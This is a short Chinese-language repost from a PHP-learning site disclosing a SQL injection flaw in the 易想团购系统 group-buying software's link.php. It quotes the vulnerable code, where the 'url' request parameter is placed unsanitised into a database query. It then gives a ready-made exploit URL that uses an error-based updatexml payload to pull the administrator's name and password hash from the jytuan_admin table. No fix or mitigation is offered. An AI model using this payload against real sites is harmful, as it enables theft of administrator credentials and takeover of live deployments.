来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 易想团购系统link.php页面内代码if($_REQUEST[#39;act#39;]==#39;go#39;) //link标签 go{ $url = ($_REQUEST[#39;url#39;]); //直接取了url的值就带入了sql查询语句了 $link_item ......
|
易想团购系统link.php页面内代码
if($_REQUEST['act']=='go') //link标签 go
{
$url = ($_REQUEST['url']); //直接取了url的值就带入了sql查询语句了
$link_item = $GLOBALS['db']->getRowCached("select * from ".DB_PREFIX."link where (url = '".$url."' or url = 'http://".$url."') and is_effect = 1"); //带入查询了
if($link_item)
{
if(check_ipop_limit(get_client_ip(),"Link",10,$link_item['id']))
$GLOBALS['db']->query("update ".DB_PREFIX."link set count = count + 1 where id = ".$link_item['id']);
$url = "http://".$url;
}
else
{
$url = APP_ROOT."/";
}
app_redirect($url);
}
EXP:
\ http://www.xxx.com/link.php?act=go&city=sanming&url=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from jytuan_admin limit 1)),1))%23
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
